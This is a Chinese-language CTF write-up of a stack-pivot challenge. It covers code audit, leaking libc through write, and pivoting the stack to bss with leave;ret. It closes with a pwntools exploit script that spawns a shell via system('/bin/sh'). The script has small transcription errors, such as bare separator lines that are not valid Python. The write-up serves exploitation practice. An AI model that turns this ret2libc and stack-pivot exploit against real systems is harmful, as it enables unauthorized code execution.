记一道栈迁移题目

---

前言

【PWN · 栈迁移】[BUUCTF]ciscn_2019_es_2_Mr_Fmnwon的博客-CSDN博客

---

一、代码审计

总结信息如下： 

1. 第12行存在栈溢出漏洞，刚好可以溢出覆盖到ebp和ret

2. 第9行可输入大量数据到bss段

二、思路过程

1.栈迁移

进能够覆盖ebp和ret，很难不往栈迁移上想。

修改ebp和ret后我们可以将栈指针指向另一处地址addr，需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发栈迁移的基本过程。

查看整个代码发现没有后门函数。

2.泄露libc

没有system函数的使用，但是有write函数。我们可以通过write泄露write的真实地址，从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。

3.组合流程①

read大量数据，可以是

aaaa + write.plt + main_addr + p32(1) + write.got + p32(4) 

栈迁移后，栈顶被弹出，栈指针指向write.plt，调用write函数，参数为 (fd=1,write_real_addr,len)，然后ret到main_addr，从头再次触发漏洞。

4.组合流程②

read大量数据，可以是

aaaa + system_addr + p32(0) + str_bin_sh

调用system('/bin/sh')，其中p32(0)仅为了占位

其中system和str_bin_sh通过泄露出来的write的地址得到libc版本，进而得到偏移量。

三、exp

from pwn import *
from pwn import u32,p32
from LibcSearcher import *

context.log_level='debug'
# context.terminal = ['tmux','splitw','-h']
io=process('./pwn')
# io=remote('node4.buuoj.cn',25236)9

elf=ELF('./pwn')

main_addr=0x08048513
bss_addr=0x0804A300
leave_ret=0x08048511

# gdb.attach(proc.pidof(io)[0],gdbscript="b main")
==========第一次触发漏洞
payload=b'a'*4+p32(elf.plt['write'])+p32(main_addr)+p32(1)+p32(elf.got['write'])+p32(6)
io.sendafter(b'name?',payload)
payload=b'a'*24+p32(bss_addr)+p32(leave_ret)
io.sendafter(b'say?',payload)
write_addr=u32(io.recv(4))
print(hex(write_addr))
==========泄露libc->泄露system地址、str_bin_sh地址
libc=LibcSearcher('write',write_addr)
write_bias=libc.dump('write')
system_bias=libc.dump('system')
bin_sh=libc.dump('str_bin_sh')
system_addr=write_addr-write_bias+system_bias
bin_sh_addr=write_addr-write_bias+bin_sh
==========第二次触发漏洞
payload=b'a'*4+p32(system_addr)+p32(0)+p32(bin_sh_addr)
io.sendafter(b'name?',payload)
payload=b'a'*24+p32(bss_addr)+p32(leave_ret)
io.sendafter(b'say',payload)
io.interactive()